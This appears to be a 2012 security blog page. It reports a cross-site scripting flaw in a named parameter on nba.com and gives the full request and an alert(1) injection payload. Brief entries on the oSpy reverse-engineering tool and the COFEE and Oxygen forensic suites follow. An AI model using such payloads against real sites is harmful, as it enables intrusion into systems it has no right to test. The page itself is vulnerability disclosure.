Monday, 5. March 2012
nba.com - XSS
On Monday, 5. Mar 2012 in topic 'Vulnerabilities'
Details:
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.
Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom
oSpy - Sniffing Local Application Calls
On Monday, 5. Mar 2012 in topic 'Tools'
oSpy is a tool which aids in reverse-engineering software running on the Windows platform.
oSpy already intercepts one such API: the one used by MSN Messenger, Google Talk, etc. for encrypting/decrypting HTTPS data.
Download
http://code.google.com/p/ospy/downloads/list
Online Forensic Evidence Extractor (COFEE)
On Monday, 5. Mar 2012 in topic 'Forensic'
Microsoft has created Computer Online Forensic Evidence Extractor (COFEE), designed exclusively for use by law enforcement agencies. COFEE brings together a number of common digital forensics capabilities into a fast, easy-to-use, automated tool for first responders. And COFEE is being provided—at no charge—to law enforcement around the world.
With COFEE, law enforcement agencies without on-the-scene computer forensics capabilities can now more easily, reliably, and cost-effectively collect volatile live evidence. An officer with even minimal computer experience can be tutored—in less than 10 minutes—to use a pre-configured COFEE device. This enables the officer to take advantage of the same common digital forensics tools used by experts to gather important volatile evidence, while doing little more than simply inserting a USB device into the computer.
Info
http://www.microsoft.com/industry/government/solutions/cofee/default.aspx
Oxygen Forensic Suite
On Monday, 5. Mar 2012 in topic 'Forensic'
Besides the general data extracted by similar products, Oxygen Forensic Suite can extract a lot of unique information.
Using low-level protocols allows the program to extract: phone basic information and SIM-card data, contacts list, caller groups, speed dials, missed/outgoing/incoming calls, standard SMS/MMS/E-mail folders, custom SMS/MMS/E-mail folders, deleted SMS messages (with some restrictions), SMS Center timestamps, calendar events schedule, tasks, text notes, photos, videos, sounds, LifeBlog data (all main phone events with their geographical coordinates), Java applications, file system from phone memory and flash card, GPRS and Wi-Fi activity, voice records and much more. The list of supported features depends on the phone model.
Download
http://www.oxygen-forensic.com/de/download/